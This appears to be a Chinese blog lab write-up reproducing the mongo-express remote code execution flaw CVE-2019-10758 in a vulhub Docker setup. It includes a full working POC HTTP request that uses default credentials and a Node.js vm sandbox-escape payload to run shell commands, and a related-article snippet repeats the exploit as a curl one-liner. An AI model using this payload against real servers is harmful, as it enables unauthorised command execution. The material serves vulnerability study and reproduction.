mongo-express 代码执行 (cve-2019-10758)

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量839 收藏
点赞数
分类专栏: 渗透测试实验 文章标签: github docker git
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51459600/article/details/122133891
版权

1.环境搭建

项目地址:

vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com)

拉取项目:

git clone https://github.com.cnpmjs.org/vulhub/vulhub.git

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224172635.png)]

安装docker-compose:

curl -L https://github.com/docker/compose/releases/download/1.27.4/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
chmod 775 docker-compose

回到项目的目录

docker-compose up -d

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aLzMjoxL-1640341732205)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224174132.png)]

浏览器访问192.168.2.101:8081

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B9XmvyS7-1640341732207)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224174928.png)]

2.漏洞利用

POC如下:

POST /checkValid HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch  /tmp/hummer")

抓包,修改http头重放即可执行命令

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zTA2WYoU-1640341732208)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211224175548.png)]

查看结果:

3.漏洞分析

在toBSON函数中,参数string被放进vm沙箱中eval,Vm 模块提供了用于在 v8虚拟机上下文中编译和运行代码的 api。使用 VM 模块可以在沙箱环境中运行代码。沙箱代码使用不同的 v8上下文,这意味着它具有不同于代码其余部分的全局对象。vm在利用漏洞的时候逃逸出vm沙箱即可执行任意命令。

关于vm沙箱详细信息参考Sandboxing NodeJS is hard, here is why (pwnisher.gitlab.io)

toBSON函数的参数来源于req.body.document

所以我么构造的POC如下:

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/hummmer")

参考:

CVE-2019-10758:mongo-expressRCE复现分析 - 先知社区 (aliyun.com)

Hummer-200
关注
专栏目录
mongo-express 远程代码执行漏洞(CVE-2019-10758
玄道的网安博客
06-20 1648
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://your-ip:8081即可查看到Web页面
mongo-express 远程代码执行漏洞复现
Tauil的博客
07-30 1169
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
mongo-express 代码执行cve-2019-10758
weixin_48817799的博客
12-30 1273
文章目录前言一、复现过程总结 前言 名称: mongo-express 代码执行cve-2019-10758) 描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 提示:以下是本篇文章正文内容,下面案例可供参考 一、复现过程 1.老样子,fofa靶场http://vulfocus.fofa.so 信息提示如下 2.页面.
CVE-2019-10758
03-08
CVE-2019-10758 PoC 设置 docker run -p 27017:27017 -d mongo npm install mongo-express@0.53.0 cd node_modules/mongo-express/ && node app.js cURL利用 curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")' 脚本
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1365
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
CVE-2019-10758mongo-express 远程代码执行漏洞复现
Beret-81的博客
06-18 704
mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现 漏洞描述 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 漏洞环境 环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 执行如下命令启动一个0.53.0版本的mo
Mongo-Express RCE(CVE-2019-10758)复现排查
dayouzi的博客
08-14 1125
Mongo-express是的管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
negnegil的博客
09-07 4144
mongo-express mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写 漏洞介绍 在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码 复现环境 mongo-express 0.53.0 MongoDB Version 3.4.24 漏洞环境搭建 采用github开源docker漏洞环境搭建而成 项目地址: https:/
cve-2019-10758 mongo-express rce 漏洞分析
whatday的专栏
06-14 1487
下面是对漏洞的描述: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses thetoBSONmethod. A misuse of thevmdependency to performexeccommands in a non-safe environment. 环境搭建 漏洞复现需要准备的环境有: MongoDB node & npm mon...
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
黑白的博客
12-22 1304
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现
ADummy的博客
03-04 539
mongo-express 远程代码执行漏洞(CVE-2019-10758) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 0x 02漏洞复现 ...
vulhub漏洞复现40_Mongo-express
weixin_44193247的博客
02-09 425
vulhub漏洞复现练习篇
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6330
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
彻底弄懂Spring中Bean的解析、创建和使用
前往JAVA架构的路上
06-28 2598
Spring加载Bean、实例化Bean、获取Bean流程 本文旨在通过分析源码的方式,来剖析Spring加载Bean、实例化Bean、获取Bean的流程,部分核心内容会在源码中说明。内容比较枯燥,慎入! 第一步,启动一个Spring项目 Spring启动入口 从官方文档中我们可以获取到下面这种Spring的启动方式。 我们传入一个text.xml文件 ApplicationContext context = new ClassPathXmlApplicationContext("classpa
mongo-express 远程代码执行漏洞分析
蚁景网安学院
06-30 760
搭建调试环境,调试 CVE-2019-10758 漏洞,学习nodejs 沙箱绕过,以及nodejs 远程调试。目前网上关于该漏洞的基于docker的远程调试分析写的很泛,本文从初学者角...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值